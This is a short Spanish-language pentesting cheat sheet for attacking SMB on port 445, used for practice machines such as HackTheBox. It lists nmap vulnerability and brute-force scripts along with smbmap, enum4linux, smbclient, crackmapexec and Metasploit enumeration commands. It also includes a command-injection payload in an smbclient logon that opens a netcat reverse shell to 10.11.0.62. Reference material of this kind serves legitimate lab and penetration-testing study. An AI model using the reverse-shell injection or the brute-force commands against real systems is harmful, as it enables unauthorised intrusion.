445 - SMB

Nmap

nmap -p 135,139,445 --script smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-ls,smb-mbenum,smb-os-discovery,smb-print-text,smb-psexec,smb-protocols,smb-security-mode,smb-system-info,smb-double-pulsar-backdoor,smb-security-mode,smb-server-stats,smb-system-info,smb-vuln* IP

Fuerza bruta con nmap

nmap -sS -sU --script=smb-brute.nse -p139,445 U:137 <host> -n

nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host> -n

smb: \> logon "/=`nc 10.11.0.62 443 -e /bin/bash`"

Probar

  • Enumeración con metasploit

msf > use auxiliary/scanner/smb/smb_enumshares

  • Diferentes enumeraciones

smbmap -H IP
enum4linux -a IP
nmblookup -A 192.168.1.1
nbtscan IP

  • SmbClient

smbclient -L //IP
smbclient -L //192.168.1.2/myshare -U anonymous

  • Crackmapexec

crackmapexec smb IP

//usando credenciales

crackmapexec smb IP -u username -p password

Herramientas

  • SMBClient

  • SMBMap

  • SMBpassword

Máquinas resueltas que usan SMB

• HTB - ypuffy

• HTB - Bastion

Referencias

Previous443 - HTTPSNext464 - kpasswd5

Last updated